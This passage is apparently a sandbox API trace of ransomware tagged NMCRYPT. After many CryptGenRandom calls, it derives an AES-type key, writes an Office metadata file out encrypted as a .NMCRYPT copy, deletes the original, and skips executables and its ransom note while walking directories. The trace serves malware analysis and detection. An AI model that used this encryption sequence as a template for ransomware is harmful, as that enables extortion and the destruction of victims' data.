hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.047] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0171.047] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7f090, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.047] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad7f8) returned 1 [0171.047] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7f190, dwFlags=0x0) returned 1 [0171.047] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7f040*=0x1, dwFlags=0x0) returned 1 [0171.047] wcslen (_String="\\\\?\\") returned 0x4 [0171.047] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7f014 | out: phKey=0x2d7f014*=0x9ad338) returned 1 [0171.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0171.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0171.047] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7f004 | out: lpFileSize=0x2d7f004*=281) returned 1 [0171.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7effc*=0x200, lpOverlapped=0x0) returned 1 [0171.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0171.048] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0171.048] GetLastError () returned 0x0 [0171.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0171.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x19, lpOverlapped=0x0) returned 1 [0171.094] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x19, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x20) returned 1 [0171.094] GetLastError () returned 0x0 [0171.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x20, lpOverlapped=0x0) returned 1 [0171.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x0, lpOverlapped=0x0) returned 1 [0171.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7effc*=0x0, lpOverlapped=0x0) returned 1 [0171.095] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 0x220 [0171.095] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml", dwFileAttributes=0x220) returned 1 [0171.096] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 1 [0171.096] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 1 [0171.097] CryptDestroyKey (hKey=0x9ad338) returned 1 [0171.097] wcslen (_String="OK") returned 0x2 [0171.097] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.097] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.097] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0171.097] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0171.097] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0171.097] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0171.097] wcscmp (_String1="Office16", _String2=".") returned 1 [0171.097] wcscmp (_String1="Office16", _String2="..") returned 1 [0171.098] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0171.098] wcscmp (_String1="PackageManifests", _String2=".") returned 1 [0171.098] wcscmp (_String1="PackageManifests", _String2="..") returned 1 [0171.098] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0171.098] PathMatchSpecW (pszFile="reprint.exe", pszSpec="*NMCRYPT") returned 0 [0171.098] PathMatchSpecW (pszFile="reprint.exe", pszSpec="*Recovers your files.html") returned 0 [0171.098] PathMatchSpecW (pszFile="reprint.exe", pszSpec="*.exe") returned 1 [0171.098] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0171.098] wcscmp (_String1="root", 